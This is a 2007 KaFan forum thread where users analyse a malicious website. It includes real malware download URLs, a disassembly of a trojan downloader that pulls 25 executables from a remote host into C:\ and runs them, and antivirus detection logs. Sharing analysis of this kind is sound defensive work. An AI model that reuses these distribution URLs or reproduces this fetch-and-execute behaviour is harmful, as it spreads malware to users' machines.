收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 毒网
12
返回列表 发新帖
楼主: ddd243346081
 收起左侧

毒网

[复制链接]
promised
发表于 2007-11-10 14:41:33 | 显示全部楼层
xxtea+base64
回复

举报

promised
发表于 2007-11-10 14:43:25 | 显示全部楼层
http://doo.yoyo59.com/dd/bd.cab
http://60.190.118.121/kj.exe
回复

举报

promised
发表于 2007-11-10 14:47:32 | 显示全部楼层
要下的是一样的,又是下木马群的
015E3   PUSH kj.004014F8                          ASCII "http://doo.yoyo59.com/down/1.exe "
004015F0   PUSH kj.004014EC                          ASCII "c:\2.exe"
004015F5   PUSH kj.004014C8                          ASCII "http://doo.yoyo59.com/down/2.exe "
00401602   PUSH kj.004014BC                          ASCII "c:\3.exe"
00401607   PUSH kj.00401498                          ASCII "http://doo.yoyo59.com/down/3.exe "
00401614   PUSH kj.0040148C                          ASCII "c:\4.exe"
00401619   PUSH kj.00401468                          ASCII "http://doo.yoyo59.com/down/4.exe "
00401626   PUSH kj.0040145C                          ASCII "c:\5.exe"
0040162B   PUSH kj.00401438                          ASCII "http://doo.yoyo59.com/down/5.exe "
00401638   PUSH kj.0040142C                          ASCII "c:\6.exe"
0040163D   PUSH kj.00401408                          ASCII "http://doo.yoyo59.com/down/6.exe "
0040164A   PUSH kj.004013FC                          ASCII "c:\7.exe"
0040164F   PUSH kj.004013D8                          ASCII "http://doo.yoyo59.com/down/7.exe "
0040165C   PUSH kj.004013CC                          ASCII "c:\8.exe"
00401661   PUSH kj.004013A8                          ASCII "http://doo.yoyo59.com/down/8.exe "
0040166E   PUSH kj.0040139C                          ASCII "c:\9.exe"
00401673   PUSH kj.00401378                          ASCII "http://doo.yoyo59.com/down/9.exe "
00401680   PUSH kj.0040136C                          ASCII "c:\10.exe"
00401685   PUSH kj.00401348                          ASCII "http://doo.yoyo59.com/down/10.exe "
00401692   PUSH kj.0040133C                          ASCII "c:\11.exe"
00401697   PUSH kj.00401318                          ASCII "http://doo.yoyo59.com/down/11.exe "
004016A4   PUSH kj.0040130C                          ASCII "c:\12.exe"
004016A9   PUSH kj.004012E8                          ASCII "http://doo.yoyo59.com/down/12.exe "
004016B6   PUSH kj.004012DC                          ASCII "c:\13.exe"
004016BB   PUSH kj.004012B8                          ASCII "http://doo.yoyo59.com/down/13.exe "
004016C8   PUSH kj.004012AC                          ASCII "c:\14.exe"
004016CD   PUSH kj.00401288                          ASCII "http://doo.yoyo59.com/down/14.exe "
004016DA   PUSH kj.0040127C                          ASCII "c:\15.exe"
004016DF   PUSH kj.00401258                          ASCII "http://doo.yoyo59.com/down/15.exe "
004016EC   PUSH kj.0040124C                          ASCII "c:\16.exe"
004016F1   PUSH kj.00401228                          ASCII "http://doo.yoyo59.com/down/16.exe "
004016FE   PUSH kj.0040121C                          ASCII "c:\17.exe"
00401703   PUSH kj.004011F8                          ASCII "http://doo.yoyo59.com/down/17.exe "
00401710   PUSH kj.004011EC                          ASCII "c:\18.exe"
00401715   PUSH kj.004011C8                          ASCII "http://doo.yoyo59.com/down/18.exe "
00401722   PUSH kj.004011BC                          ASCII "c:\19.exe"
00401727   PUSH kj.00401198                          ASCII "http://doo.yoyo59.com/down/19.exe "
00401734   PUSH kj.0040118C                          ASCII "c:\20.exe"
00401739   PUSH kj.00401168                          ASCII "http://doo.yoyo59.com/down/20.exe "
00401746   PUSH kj.0040115C                          ASCII "c:\21.exe"
0040174B   PUSH kj.00401138                          ASCII "http://doo.yoyo59.com/down/21.exe "
00401758   PUSH kj.0040112C                          ASCII "c:\22.exe"
0040175D   PUSH kj.00401108                          ASCII "http://doo.yoyo59.com/down/22.exe "
0040176A   PUSH kj.004010FC                          ASCII "c:\23.exe"
0040176F   PUSH kj.004010D8                          ASCII "http://doo.yoyo59.com/down/23.exe "
0040177C   PUSH kj.004010CC                          ASCII "c:\24.exe"
00401781   PUSH kj.004010A8                          ASCII "http://doo.yoyo59.com/down/24.exe "
0040178D   MOV EBP,kj.0040109C                       ASCII "c:\25.exe"
00401794   PUSH kj.00401078                          ASCII "http://doo.yoyo59.com/down/25.exe "
004017A2   MOV EDI,kj.00401070                       ASCII "open"
回复

举报

啊弥陀佛
发表于 2007-11-10 15:02:59 | 显示全部楼层
蠕虫名称:未知网络蠕虫

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5\IBUYQN0P\KJ[1].EXE
是蠕虫程序!
已成功阻止其运行,是否要删除此文件?
回复

举报

tedsky
发表于 2007-11-10 15:56:02 | 显示全部楼层
穿着EQ小裤衩乱入没啥感觉
回复

举报

4848023
发表于 2007-11-10 17:41:06 | 显示全部楼层
用opera进去一点事也没有,里面的内容很爽
回复

举报

worker321
头像被屏蔽
发表于 2007-11-10 17:47:45 | 显示全部楼层
应ie打开,就有一个病毒下载到桌面,小红伞扫描ie缓存还报一个
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\H8ONTHWD\tj[1].htm
      [DETECTION] Contains suspicious code HEUR/Exploit.HTML
      [WARNING]   The file was ignored!


已扫描的磁盘,文件夹及文件:C:\Documents and Settings\Administrator\桌面\kj.exe
C:\Documents and Settings\Administrator\桌面\kj.exe - 未查明的 NewHeur_PE 病毒 [7]
已扫描的文件数目:1
已发现的病毒数目:1
完成时间: 17:49:42 总扫描时间:0 秒 (00:00:00)
注意:
[7] 该文件可能感染上未知病毒。
回复

举报

wusuobuzai
发表于 2007-11-11 18:41:55 | 显示全部楼层
我用ESS进去狂报啊~!
真的好爽哦~!
回复

举报

12
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-20 17:16 , Processed in 0.122267 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表